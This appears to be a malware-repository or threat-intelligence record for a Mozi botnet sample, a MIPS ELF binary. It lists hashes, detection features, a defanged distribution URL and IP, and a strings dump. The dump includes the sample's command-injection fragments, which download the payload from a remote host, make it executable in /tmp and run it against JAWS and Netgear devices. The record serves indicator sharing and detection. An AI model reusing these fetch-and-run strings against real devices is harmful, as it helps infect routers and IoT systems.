Mozi.m

First submission 2024-10-11 14:10:14

File details

File type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
Mime type:	application/x-executable
File size:	300.74 KB (307960 bytes)
MD5:	6aa8fc6f5c03e228b71eef618cea45b2
SHA1:	629afc8698b40f4b1a32690a3a4223d580e12cb7
SHA256:	d0eff71d3ca52a5670bdb29f948a7d4593aa5a7e64e445bd5eb5d5ed667fa3bd

File features detected

Is DLL

Packers

Anti Debug

Anti VM

Signed

XOR

OSINT Enrichments

Virus Total:	24/68 VT report date: 2021-12-12 09:53:42

URLs, FQDN and IP indicators 1

URL	Host (FQDN/IP)	Date Added
hXXp://117.235.99.233:36827/Mozi.m	117.235.99.233	2024-10-11 14:10:14

Strings analysis - File found

XML
M7c.xml

Strings analysis - Possible IPs found 5

127.0.0.1
192.168.3.1
239.255.255.250
192.168.1.1
192.168.0.100

Strings analysis - Possible URLs found 17

http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/Mozi.m;$
http://%s:%d/Mozi.a;sh$
http://%s:%d/Mozi.m
http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://schemas.xmlsoap.org/soap/envelope//
http://%s:%d/Mozi.m;
http://upx.sf.net
http://www.w3.org/2001/XMLSchema
http://www.w3.org/2001/XMLSchema-instance
http://schemas.xmlsoap.org/soap/encoding/
http://%s:%d
http://%s:%d/Mozi.m+-O+-
http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
http://purenetworks.com/HNAP1/
http://schemas.xmlsoap.org/soap/envelope/